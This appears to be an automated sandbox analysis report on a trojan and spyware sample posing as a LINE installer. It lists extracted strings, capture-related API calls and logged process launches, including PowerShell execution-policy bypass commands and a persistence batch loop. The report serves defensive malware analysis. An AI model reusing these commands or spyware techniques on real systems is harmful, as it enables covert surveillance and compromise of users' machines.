Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop.line-scdn.net/win/bin/real/installer/installer.jsonSoftware
Source: powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=en
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=en=
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=es
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=id
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=ja
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=ko
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=th
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://terms.line.me/line_terms?lang=zh-Hant

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8C25C0 GetAsyncKeyState,SendMessageW,GetClientRect,SetScrollPos
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8A43B7 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C88D0FE GetKeyState,GetKeyState,GetKeyState,SendMessageW
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C861100 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427B43F ExitWindowsEx
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427B41B ExitWindowsEx
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0427B463 ExitWindowsEx
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00404FAA
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0041206B
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0041022D
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00411F91
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004C4059
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004A9000
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004CA0E7
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004CC1D1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004CA265
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004CC2F1
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004A9710
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004BA7D0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004A39C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B8B3F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004C9D02
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04276C50
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04276EE0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_042724B0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428E341
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04288381
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428DDF0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428D89F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04278900
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428F9FF
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0428EA1D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C898F4D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C874F70
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C87EF70
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9C2AA0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C87EBC0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8745C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C9CA6C4
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C88462E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8BA041
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8B21AB
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C88835D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8ABC7D
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C951DCD
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C851ED0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C88DB3F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C8BB44F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C85F470
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C933588
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C89D2F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_02F3C240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_02F3AF97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_02F3B1C8
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: String function: 0040243B appears 37 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C89D750 appears 75 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 004B22C0 appears 53 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C89F515 appears 262 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C8E2FD1 appears 71 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 04284300 appears 32 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C880847 appears 243 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C89F61F appears 44 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C95D33F appears 42 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C88052B appears 63 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C87D770 appears 37 times
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: String function: 6C89F57E appears 96 times
Source: OdiHmn3pRK.exe | Static PE information: invalid certificate
Source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLineInstaller.exe< vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekwpswnsserver.exe6 vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamensdksetupJ vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLineInstaller.exe< vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe, 00000000.00000003.1703128868.00000000025C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe | Binary or memory string: OriginalFilenameV vs OdiHmn3pRK.exe
Source: OdiHmn3pRK.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04277620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04277740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04277B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04276050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File created: C:\Users\Public\Bilite
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File created: C:\Users\user\AppData\Local\Temp\monitor.bat
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: \office6 | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: WinMain | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: checkrt | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: cmd= | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: check_mode | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: unregister_mode | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: wake_mode | 3_2_004A9A30
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Command line argument: register_mode | 3_2_004A9A30
Source: OdiHmn3pRK.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KWPSWNSSERVER.EXE'
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tasklist.exe, 0000000A.00000002.2466231414.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465822500.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465842960.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000000A.00000003.2465777381.00000000007E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KWPSWNSSERVER.EXE'Wbem;C
Source: tasklist.exe, 00000017.00000002.3064391218.0000000002F54000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063934382.0000000002F4F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063902721.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.3063959133.0000000002F53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KWPSWNSSERVER.EXE'\Wbem;C:\Win
Source: OdiHmn3pRK.exe | Virustotal: Detection: 28%
Source: OdiHmn3pRK.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File read: C:\Users\user\Desktop\OdiHmn3pRK.exe
Source: unknown | Process created: C:\Users\user\Desktop\OdiHmn3pRK.exe "C:\Users\user\Desktop\OdiHmn3pRK.exe"
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
